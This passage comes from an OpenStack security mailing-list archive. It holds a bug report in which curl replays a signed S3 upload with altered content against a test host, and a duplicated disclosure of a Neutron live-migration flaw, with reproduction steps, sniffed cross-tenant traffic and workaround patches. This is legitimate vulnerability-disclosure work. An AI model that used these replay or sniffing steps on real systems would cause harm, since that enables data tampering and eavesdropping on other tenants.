DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: 
signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... 
* TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From obondarev at mirantis.com Thu Oct 24 12:41:14 2019 From: obondarev at mirantis.com (Oleg Bondarev) Date: Thu, 24 Oct 2019 12:41:14 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157192087424.29095.8662746616400762200.malone@soybean.canonical.com> Copying here my comment on neutron patch https://review.opendev.org/640258/: not sure the failures are related to DVR: it seems we only run full tempest set with dvr enabled (with OVS). Test failures are mostly about VM not becoming ACTIVE (stuck in BUILD), I guess due to neutron VM port not becoming ACTIVE. This should not be affected by DVR in any way. Also in ovs agent logs I see errors on ovs- vsctl operations with ports having ofport -1. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. 
* Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. 
Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From smooney at redhat.com Thu Oct 24 13:10:14 2019 From: smooney at redhat.com (sean mooney) Date: Thu, 24 Oct 2019 13:10:14 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157192261442.2795.6502369911087612363.malone@gac.canonical.com> yes so as i commented before the issue is here https://review.opendev.org/#/c/640258/15/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_dvr_neutron_agent.py at 404 We are not reading the correct field so once we fix that we expect it to work in the dvr case. that is noted in the Gerrit review. the failures are all cased by the fact we try to read a filed that does not exist this raise an error and the port does not become acitve. we the reach the timout on the nova side and role back the vm. it is not an error for a port to have -1 on the ovs side. that is what we want to allow. a ofport id of -1 mean the port is declare in the control plane e.g. in the ovs-db but has not yet been attach to the data plane. when the tap deive is actully created in the kernel it will automaticaly be added to the ovs dataplane and a ofport id will be assigned. so do be clear we expect ove to assing a port id of -1 and it may also raise a waring in the ovs-db but that is normal and the intended behavior. 
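To spell out the distinction being made here, a small sketch of how an agent could read that value (names are purely illustrative, not the patch under review):

    # Illustrative only: interpreting the "ofport" value read from ovsdb when
    # deciding whether a VIF has actually been attached to the datapath.
    def describe_ofport(ofport):
        if ofport in (None, [], ''):
            return 'no ofport recorded yet for this Interface row'
        if ofport == -1:
            # declared in the control plane (ovsdb) but not yet attached to
            # the data plane -- expected while the tap/vhost-user device is absent
            return 'present in ovsdb, not yet attached to the datapath'
        return 'attached to the datapath as OpenFlow port %s' % ofport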
this is what happens with vhost-user by the way as the ofport id does not get asigned until the vm startrs and until that point it will have a ofportid of -1 not [] -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. 
Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
